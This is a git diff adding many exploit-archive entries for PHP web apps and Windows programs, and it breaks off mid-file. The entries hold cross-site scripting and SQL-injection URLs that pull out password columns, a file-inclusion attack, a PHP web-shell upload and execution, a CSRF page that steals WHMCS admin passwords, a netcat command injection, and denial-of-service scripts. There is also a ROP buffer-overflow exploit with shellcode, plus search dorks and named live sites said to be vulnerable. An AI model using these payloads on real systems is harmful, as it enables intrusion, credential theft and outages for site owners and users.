@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24626/info
+
+Calendrix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Calendrix 0.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[PRODUCT-DIRECTORY]/calendar.php?year=<script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/calendar.php?month="><script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/yearcal.php?ycyear=<script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/cal_footer.inc.php?leftfooter=<script>alert(document.cookies)</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/30234.txt b/platforms/php/webapps/30234.txt
new file mode 100755
index 000000000..0ce233506
--- /dev/null
+++ b/platforms/php/webapps/30234.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/24633/info
+
+Calendarix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect Calendarix 0.7.20070307; other versions may also be affected. 
+
+http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
+
+http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 
\ No newline at end of file
diff --git a/platforms/php/webapps/30235.txt b/platforms/php/webapps/30235.txt
new file mode 100755
index 000000000..1cef387f9
--- /dev/null
+++ b/platforms/php/webapps/30235.txt
@@ -0,0 +1,31 @@
+# KikChat <= (LFI/RCE) Multiple Vulnerability
+# By cr4wl3r http://bastardlabs.info
+# Script : http://petitvincent.perso.free.fr/Webmastering/Script%20PHP%20HTML%20JAVASCRIPT/php%20scripts/kikchat.zip
+# Tested : Windows / Linux
+# Dork   : download script
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Vulnable LFI [ private.php ]
+
+http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../[file]
+http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../boot.ini
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Vulnable RCE [ /rooms/get.php ]:
+
+http://127.0.0.1/KikChat/rooms/get.php?name=shell.php&ROOM=<?php system($cmd); ?>
+http://127.0.0.1/KikChat/myroom/shell.php?cmd=whoami;id;uname -a;pwd;ls -al
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+makase banyak :
+
+tau lo bentor to hulandalo
+tamongodula'a wau tamohutata, dulo ito momongulipu
+
+
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+p.s 
+malandingalo wa'u sebenarnya mohutu sploitz
+bo sekedar koleksi saja :D
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+
+
+// gorontalo 2013
diff --git a/platforms/php/webapps/30238.txt b/platforms/php/webapps/30238.txt
new file mode 100755
index 000000000..1842b345e
--- /dev/null
+++ b/platforms/php/webapps/30238.txt
@@ -0,0 +1,73 @@
+##########################################################################
+# Exploit Title: Cythosia Botnet SQL-Injection Vulnerability 
+ # Date: 11.12.2013
+ # Exploit Author: GalaxyAndroid
+ # Vendor Homepage: unkn0wn
+# Application Screenshots
+http://www.xylibox.com/2012/08/cythosia-botnet-vnloader.html 
+ # Version: 2.x
+ # Tested on: Windows 7 with Xampp 
+# greets goes to: ChrisKSK, Protestants in Ukraine -> keep pushing!
+# no greets to: NSA, GCHQ, USA, AUS, CAN, GBR, NZL
+#################################Vuln-Code###################################
+# Vuln-Code: 
+#All POST-Parameters in the file "socks5.php" are vuln against
+SQL-Injection
+#
+#if(!empty($_POST['hwid']) && !empty($_POST['cn']) &&
+!empty($_POST['ip']) && !empty($_POST['port']))
+#    {
+#        $query = mysql_query("SELECT * FROM hydra_socks WHERE hwid =
+'".$_POST['hwid']."'");
+#        if(mysql_num_rows($query) >= 1)
+#        {
+#            $sql = mysql_query("UPDATE hydra_socks SET ip =
+'".$_POST['ip']."', port = '".$_POST['port']."' WHERE hwid =
+'".$_POST['hwid']."'");
+#        }
+#        else
+#        {
+#            $sql = mysql_query("INSERT INTO hydra_socks (`hwid`,
+`country`, `ip`, `port`) VALUES ('".$_POST['hwid']."',
+'".$_POST['cn']."', '".$_POST['ip']."', '".$_POST['port']."')");
+#        }
+#        if(!$sql)
+#        {
+#            echo "fail";
+#            echo mysql_error();
+#        }
+##############################Exploit########################################
+#
+# PoC 1 - Gets the MySQL Version Information: 
+	POST http://127.0.0.1/cythosia/Webpanel/socks5.php HTTP/1.1
+Host: 127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 322
+Accept: */*
+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1;
+.NET CLR 2.0.50727) Miauu
+Connection: Close
+
+	hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cversion%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test
+	Response: 
+	Warning:  mysql_num_rows() expects parameter 1 to be resource,
+boolean given in C:xamppneuhtdocscythosiaWebpanelsocks5.php on line 11
+failDuplicate entry '~'5.5.32'~1' for key 'group_key'
+ # PoC 2 - whoami?
+
+POST /cythosia/Webpanel/socks5.php HTTP/1.1
+Host: 127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 319
+Accept: */*
+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1;
+.NET CLR 2.0.50727)
+Connection: Close
+
+hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cuser%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test
+Response:
+Warning:  mysql_num_rows() expects parameter 1 to be resource, boolean
+given in C:xampphtdocscythosiaWebpanelsocks5.php on line 11
+failDuplicate entry '~'root@localhost'~1' for key 'group_key'
+
+############################################################################
\ No newline at end of file
diff --git a/platforms/php/webapps/30239.txt b/platforms/php/webapps/30239.txt
new file mode 100755
index 000000000..198ac7e69
--- /dev/null
+++ b/platforms/php/webapps/30239.txt
@@ -0,0 +1,19 @@
+###############################################################
+# Exploit Title: Wordpress SEM WYSIWYG Remote File Upload Vulnerability
+# Author: Ashiyane Digital Security Team
+# Date: 12/09/2013
+# Google dork: inurl:wp-content/plugins/sem-wysiwyg/
+# Tested on: Windows/Linux
+###############################################################
+
+Exploit :
+= = = = = =
+
+http://site.com/[path]//wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
+
+= = = = = = 
+Demo:
+
+http://www.mdjustlisted.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
+
+http://www.stunicom.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
\ No newline at end of file
diff --git a/platforms/php/webapps/30243.txt b/platforms/php/webapps/30243.txt
new file mode 100755
index 000000000..43912c54d
--- /dev/null
+++ b/platforms/php/webapps/30243.txt
@@ -0,0 +1,11 @@
+# Exploit Title : Veno File Manager Arbitrary File Download Vulnerability
+# Google Dork : allintitle: "Veno File Manager"
+# Date :10/12/2013# Exploit Author : Daniel Godoy
+# Vendor Homepage :http://codecanyon.net/item/veno-file-manager/6114247?WT.ac=solid_search_item&WT.seg_1=solid_search_item&WT.z_author=nicolafranchini
+# Category : Web applications
+# Tested on : GNU/Linux  
+#[PoC] : 
+#Warning: You must be authenticated
+http://localhost/filemanager/vfm-admin/vfm-downloader.php?q=[file to download- base 64 encoded]
+
+http://localhost/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
\ No newline at end of file
diff --git a/platforms/php/webapps/30246.txt b/platforms/php/webapps/30246.txt
new file mode 100755
index 000000000..c8faa7083
--- /dev/null
+++ b/platforms/php/webapps/30246.txt
@@ -0,0 +1,149 @@
+# Exploit Title: WHMCS v4.x & v5.x - Multiple Web Vulnerabilities
+# Date: 2013-12-10
+# Exploit Author: ahwak2000
+# Vendor Homepage: http://whmcs.com/
+# Version: 4.x , 5.x
+# Tested on: win 7
+
++------------------+ 
+|   Vulnerability  | 
++------------------+ 
+
+File : includes\dbfunctions.php 
+
+function db_escape_string($string) {
+
+$string = mysql_real_escape_string($string);
+
+return $string;
+
+}
++------------------+ 
+|   Description    | 
++------------------+ 
+
+the script use this function to secure the input
+the function disable only the ' and "
+but we can bypass it  if the query don't use '
+
+
++------------+ 
+|   Example  | 
++------------+ 
+
+file : admin/invoices.php
+[...]
+$query = "UPDATE tblinvoices SET credit=credit-" . db_escape_string($removecredit) . " WHERE id='" . db_escape_string($id) . "'";
+				full_query($query);
+[...]
+
++------------+ 
+|Exploitation| 
++------------+ 
+
+CSRF to SQL And Bypass Token
+<html>
+    <body onload="submitForm()">
+    <form name="myForm" id="myForm"
+    action="http://localhost/whmcs5214/admin/invoices.php" method="post">
+    <input type="hidden" name="token" value="ahwak2000">
+    <input type="hidden" name="id" value="1">
+    <input type="hidden" name="removecredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
+    <input type="hidden" name="action" value="edit">
+    </form>
+    <script type='text/javascript'>document.myForm.submit();</script>
+</html>
+
+
+OR
+
+
+<html>
+    <body onload="submitForm()">
+    <form name="myForm" id="myForm"
+    action="http://localhost/whmcs5214/admin/invoices.php" method="post">
+    <input type="hidden" name="token" value="ahwak2000">
+    <input type="hidden" name="id" value="1">
+    <input type="hidden" name="addcredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
+    <input type="hidden" name="action" value="edit">
+    </form>
+    <script type='text/javascript'>document.myForm.submit();</script>
+</html>
+
++------------+ 
+|   Example 2| 
++------------+ 
+
+file : includes/invoicefunctions.php
+
+function applyCredit($invoiceid, $userid, $amount="", $noemail = "") {
+	$query = "UPDATE tblinvoices SET credit=credit+" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($invoiceid) . "'";
+	full_query($query);
+	$query = "UPDATE tblclients SET credit=credit-" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($userid) . "'";
+	full_query($query);
+[...]
+	}
+
+}
+
+File: /viewinvoice.php
+if ($invoice->getData("status") == "Unpaid" && 0 < $creditbal) {
+	
+	$creditamount = $whmcs->get_req_var("creditamount");
+	if ($whmcs->get_req_var("applycredit") && 0 < $creditamount) {
+		check_token();
+
+		if ($creditbal < $creditamount) {
+			echo $_LANG['invoiceaddcreditovercredit'];
+			exit();
+		}
+		else {
+			if ($balance < $creditamount) {
+				echo $_LANG['invoiceaddcreditoverbalance'];
+				exit();
+			}
+			else {
+			
+				applyCredit($invoiceid, $invoice->getData("userid"), $creditamount);
+			}
+		}
+
+		redir("id=" . $invoiceid);
+	}
+
+	$smartyvalues['manualapplycredit'] = true;
+	$smartyvalues['totalcredit'] = formatCurrency($creditbal) . generate_token("form");
+
+	if (!$creditamount) {
+		$creditamount = ($balance <= $creditbal ? $balance : $creditbal);
+	}
+
+	$smartyvalues['creditamount'] = $creditamount;
+}
++------------+ 
+|Exploitation| 
++------------+ 
+Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1  <~ edit
+
+if client have creditt and when he want to pay with credit 
+
+in the "Enter the amount to apply:" put 0.01,Address2=(SELECT password from tbladmins limit 0,1)
+
+the admin password will be in the client address
+
+
++-----------------+
+sql => xss
+
+SQL can convert to XSS 
+Must Encode XSS to Hex
+Example :
+
+(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E) //<script>alert('ahwak2000');</script>
+
+SQL can be modified to work when all members and supervisors
+(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~
+
++-------------------+
+
+./END
\ No newline at end of file
diff --git a/platforms/php/webapps/30247.txt b/platforms/php/webapps/30247.txt
new file mode 100755
index 000000000..fc8f4beeb
--- /dev/null
+++ b/platforms/php/webapps/30247.txt
@@ -0,0 +1,74 @@
+salam
+
+##########################################################################
+
+Exploit title : telmanik cms v1.01 Multiple Vulnerabilities (admin folder)
+
+Date : 12/12/2013
+
+Author : JoKeR_StEx
+
+Software Link : http://www.telmanik.com/open-source.php
+
+Tested On : WinXP PRO SP3 
+
+CVE : [~]
+
+Version : 1.01
+
+#########################################################################
+
+1) File Upload
+
+P.O.C
+
+<?
+
+# <3Algeria<3
+
+$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";
+$dz = curl_init();
+$shell = "jxdz.jpg.php";
+curl_setopt($dz,CURLOPT_URL,$web);
+curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);
+curl_setopt($dz,CURLOPT_HEADER,false);
+curl_setopt($dz,CURLOPT_VERBOSE,false);
+curl_setopt($dz,CURLOPT_POST,true);
+$jxarray = array("image1"=>"@".$shell);
+curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);
+$exec=curl_exec($dz);
+$end=curl_close($dz);
+
+?>
+
+The Shell YOu cAn Find it in /photos/
+
+2) Sql INjection (getgallery.php)
+
+The Bug In : getgallery.php
+
+ Line : 35...39
+
+ The C0de :
+/*
+if (isset($_GET['gallery'])) {
+  $colname_photos = $_GET['gallery'];
+}
+mysql_select_db($database_telmanik_press, $telmanik_press);
+$query_photos = sprintf("SELECT * FROM photos WHERE gallery = %s", GetSQLValueString($colname_photos, "text"));
+$photos = mysql_query($query_photos, $telmanik_press) or die(mysql_error());
+$row_photos = mysql_fetch_assoc($photos);
+$totalRows_photos = mysql_num_rows($photos);
+
+
+*/
+
+example :
+
+http://127.0.0.1/telmanik/upload/admin/getgallery.php
+
+###################################
+The Black Devils , Team Dz S.O.S !/
+###################################
+
+
diff --git a/platforms/php/webapps/30249.txt b/platforms/php/webapps/30249.txt
new file mode 100755
index 000000000..d3a40e577
--- /dev/null
+++ b/platforms/php/webapps/30249.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24634/info
+
+Papoo is prone to an authentication-bypass vulnerability because the application fails to check user privileges when accessing the administration pages.
+
+An attacker can exploit this issue to gain access to administration plugins. This may lead to other attacks.
+
+This issue affects Papoo 3.6; prior versions may also be affected. 
+
+http://www.example.com/interna/plugin.php?template=devtools/templates/newdump_backend.html 
\ No newline at end of file
diff --git a/platforms/php/webapps/30253.txt b/platforms/php/webapps/30253.txt
new file mode 100755
index 000000000..e8e8e734f
--- /dev/null
+++ b/platforms/php/webapps/30253.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/24681/info
+
+eTicket is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect eTicket 1.5.5 and 1.5.5.1; other versions may also be affected.
+
+http://www.example.com/open.php?err=[xss]
+http://www.example.com/open.php?warn=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/30258.txt b/platforms/php/webapps/30258.txt
new file mode 100755
index 000000000..a9061f638
--- /dev/null
+++ b/platforms/php/webapps/30258.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24741/info
+
+LightBlog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to LightBlog 6 are vulnerable. 
+
+http://www.example.com/app_path/add_comment.php?id=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/30259.txt b/platforms/php/webapps/30259.txt
new file mode 100755
index 000000000..78897bf09
--- /dev/null
+++ b/platforms/php/webapps/30259.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24742/info
+
+Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Claroline 1.8.4 are vulnerable. 
+
+http://www.example.com/index.php?[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/30261.txt b/platforms/php/webapps/30261.txt
new file mode 100755
index 000000000..edec42bc4
--- /dev/null
+++ b/platforms/php/webapps/30261.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24748/info
+
+Moodle is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects Moodle 1.7.1; other versions may also be vulnerable. 
+
+http://www.example.com/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20 
\ No newline at end of file
diff --git a/platforms/php/webapps/30262.txt b/platforms/php/webapps/30262.txt
new file mode 100755
index 000000000..c6d752cfd
--- /dev/null
+++ b/platforms/php/webapps/30262.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24749/info
+
+Liesbeth Base CMS is prone to an information-disclosure vulnerability.
+
+Exploiting this issue may allow an attacker to access sensitive information that may aid in further attacks. 
+
+http://www.example.com/config.inc 
\ No newline at end of file
diff --git a/platforms/php/webapps/30277.txt b/platforms/php/webapps/30277.txt
new file mode 100755
index 000000000..550c9eb35
--- /dev/null
+++ b/platforms/php/webapps/30277.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24770/info
+
+Maia Mailguard is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an unauthorized user to view files and execute local scripts.
+
+These issues affects Maia Mailguard 1.0.2 and prior versions. 
+
+http://www.example.com/maia/login.php?lang=../../../../../../../../../../../../../var/log/httpd-error.log%00.txt 
\ No newline at end of file
diff --git a/platforms/php/webapps/30283.txt b/platforms/php/webapps/30283.txt
new file mode 100755
index 000000000..20eb312e5
--- /dev/null
+++ b/platforms/php/webapps/30283.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/24828/info
+
+Vulnerabilities in the SquirrelMail G/PGP encryption plugin may allow malicious webmail users to execute system commands remotely. These issues occur because the application fails to sufficiently sanitize user-supplied data.
+
+Commands would run in the context of the webserver hosting the vulnerable software.
+
+Reports indicate that these vulnerabilities reside in SquirrelMail G/PGP 2.0 and 2.1 and that the vendor is aware of the issues. This has not been confirmed.
+
+No further technical details are currently available. We will update this BID as more information emerges. 
+
+$ nc *** 80
+POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
+Host: ***
+User-Agent: w00t
+Keep-Alive: 300
+Connection: keep-alive
+Cookie: Authentication Data for SquirrelMail
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 140
+
+id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1 
\ No newline at end of file
diff --git a/platforms/windows/dos/30224.py b/platforms/windows/dos/30224.py
new file mode 100755
index 000000000..aa7486538
--- /dev/null
+++ b/platforms/windows/dos/30224.py
@@ -0,0 +1,47 @@
+source: http://www.securityfocus.com/bid/24585/info
+
+Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.
+
+Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
+
+# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
+# Date: 2010-08-14
+# Author: fdisk
+# Version: 2.6
+# Tested on: Windows 2003 Server SP1 en
+# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
+# Notes: Fixed in the last version.
+# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
+
+import socket
+import sys
+
+if len(sys.argv) != 4:
+    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
+    print "Vulnerable Services: iigcc, iijdbc"
+    sys.exit(1)
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+service = sys.argv[3]
+
+if service == "iigcc":
+        payload = "\x41" * 2106
+elif service == "iijdbc":
+        payload = "\x41" * 1066
+else:
+        print "Vulnerable Services: iigcc, iijdbc"
+        sys.exit(1)
+
+payload += "\x42" * 4
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+print "Sending payload"
+s.send(payload)
+data = s.recv(1024)
+s.close()
+print 'Received', repr(data)
+
+print service + " crashed"
+
diff --git a/platforms/windows/dos/30233.pl b/platforms/windows/dos/30233.pl
new file mode 100755
index 000000000..aa033b4fe
--- /dev/null
+++ b/platforms/windows/dos/30233.pl
@@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/24628/info
+
+LiteWeb webserver is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
+
+An attacker can exploit this issue to crash the affected application, denying further service to legitimate users.
+
+This issue affects LiteWeb 2.7; other versions may also be vulnerable. 
+
+#!/usr/bin/perl
+#GetOpt STD module
+use IO::Socket;
+use Getopt::Std;
+getopts(":i:p:",\%args);
+if(defined $args{i}){
+$ip = $args{i};
+}
+if(defined $args{p}){
+$port = $args{p};
+}
+if(!defined $args{i} or !defined $args{p}){
+print "-----------------------------------------------------\n";
+print "LiteWEB 2.7 404 Denial of Services\n";
+print "info: if u send to the server more than 100 requests\nto nonexisting
+
+pages the server will stop to answer\n";
+print "Site: http://www.cmfperception.com/liteweb.html\n";
+print "Found By Prili - imprili[at]gmail.com\n";
+print "Usage: perl $0 -i <ip address> -p <port> \n";
+print "-----------------------------------------------------\n";
+exit;
+}
+$protocol = "tcp";
+print "try surfing to the web server.\n";
+while (1)
+{
+$request = "GET /AAAAAAA HTTP/1.0 \n\n";
+$socket = IO::Socket::INET->new(PeerAddr=>$ip,
+                               PeerPort=>$port,
+                               Proto=>$protocol,
+                               Timeout=>'1') || die "Can't connect to
+
+address!\n";
+
+print $socket $request;
+close($socket);
+}
diff --git a/platforms/windows/dos/30252.py b/platforms/windows/dos/30252.py
new file mode 100755
index 000000000..febb9971e
--- /dev/null
+++ b/platforms/windows/dos/30252.py
@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/24672/info
+
+The Conti FTP Server is prone to a denial-of-service vulnerability.
+
+A remote attacker may be able to exploit this issue to deny service to legitimate users of the application. 
+
+#Conti FTP Server v1.0 Denial of Service
+#author: 35c666
+#contact: :(
+#Download:
+http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe
+#Bug: Conti Ftp Server crashes when a large //A: string is sent,
+denying legitimate users access to their accounts.
+#greetz to all  RST members at http://rstzone.net
+
+# usr/bin/python
+
+import socket
+import time
+
+buff = "//A:"
+
+user = "test"
+password = "test"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+   conn = s.connect(("172.16.112.129",21))
+   d = s.recv(1024)
+   print "Server <- " + d
+   time.sleep(2)
+
+   s.send('USER %s\r\n' % user)
+   print "Client -> USER " + user
+   d = s.recv(1024)
+   print "Server <- " + d
+   time.sleep(2)
+
+   s.send('PASS %s\r\n' % password)
+   print "Client -> PASS " + password
+   d = s.recv(1024)
+   print "Server <- " + d
+   time.sleep(2)
+
+   s.send('LIST %s\r\n' % buff)
+   print "Client -> LIST " + buff
+   d = s.recv(1024)
+   print d
+   time.sleep(2)
+
+except:
+   print "- Nu m-am putut conecta."
+
diff --git a/platforms/windows/dos/30255.txt b/platforms/windows/dos/30255.txt
new file mode 100755
index 000000000..efcdd1306
--- /dev/null
+++ b/platforms/windows/dos/30255.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24693/info
+
+PC SOFT WinDEV is prone to a stack-based buffer-overflow vulnerability when it attempts to process malformed project files. This issue occurs because the application fails to perform proper bounds-checking on user-supplied data before copying it to an insufficiently sized memory buffer.
+
+An attacker may exploit this issue to execute arbitrary code with the privileges of the user running the vulnerable application or to cause denial-of-service conditions. This may facilitate unauthorized access or privilege escalation.
+
+PC SOFT WinDEV 11 is reported vulnerable; other versions and related products (WinDEV Express, Mobile, and WebDEV) may also be affected. 
+
+http://www.exploit-db.com/sploits/30255.zip
\ No newline at end of file
diff --git a/platforms/windows/local/30244.py b/platforms/windows/local/30244.py
new file mode 100755
index 000000000..f1f77d5b7
--- /dev/null
+++ b/platforms/windows/local/30244.py
@@ -0,0 +1,67 @@
+# Castripper 2.50.70 (.pls) exploit (Stack buffer overflow/DEP bypass)
+# Download: http://www.mini-stream.net/castripper/
+# Tested on Wind0ws XP SP3 DEP:OptOut
+# Author: Lu_c_fer ------>>> Lu_c_fer@aol.com
+
+# All ROP gadgets are from the APP's DLLs except for the hardcoded SetProcessDEPPolicy() address
+
+
+
+import struct
+
+f = open("Eploit_SetProcessDEPPolicy.pls", "w")
+
+crash = "\x41"*26076
+
+rop = struct.pack("<I", 0x10010e0d)   # POP EDX # RETN
+rop += struct.pack("<I", 0x42424242)  # junk
+rop += struct.pack("<I", 0x42424242)  # junk
+
+#-----------------------Setting the pointer into EBP---------------------
+rop += struct.pack("<I", 0x1003c03c)  # POP EBP # RETN
+rop += struct.pack('<L', 0x7c862144)  # PTR to SetProcessDEPPolicy() 
+
+#-----------------------EBX is will be 0x00000000
+rop += struct.pack('<L', 0x1001ab37)  # POP EBX # RETN [CRfilter03.dll] 
+rop += struct.pack('<L', 0xFFFFFFFF)  # 0x00000000 
+rop += struct.pack('<L', 0x10010f68)  # INC EBX # CMP BYTE PTR SS:[EBP+5B],BL # RETN
+
+
+rop += struct.pack('<L', 0x10023b57)  # POP EDI # RETN [CRfilter03.dll] 
+rop += struct.pack('<L', 0x10041e68)  # skip 4 bytes [CRfilter03.dll]
+rop += struct.pack('<L', 0x10010fb5)  # POP ESI # RETN
+rop += struct.pack('<L', 0x10041e68)
+rop += struct.pack('<L', 0x1001e4e0)  # PUSHAD # RETN [CRfilter03.dll] 
+
+
+
+sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
+"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
+"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
+"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
+"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
+"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
+"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
+"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
+"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
+"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
+"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
+"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
+"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
+"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
+"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
+"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
+"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
+"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
+"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
+"\x51\x42\x4c\x42\x43\x43\x30\x41\x41")
+
+junk = "\x43"*5000
+
+payload = crash + rop + sc + junk 
+
+f.write(payload)
+
+f.close()
diff --git a/platforms/windows/remote/30257.html b/platforms/windows/remote/30257.html
new file mode 100755
index 000000000..805f7f682
--- /dev/null
+++ b/platforms/windows/remote/30257.html
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/24730/info
+
+HP Instant Support ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
+
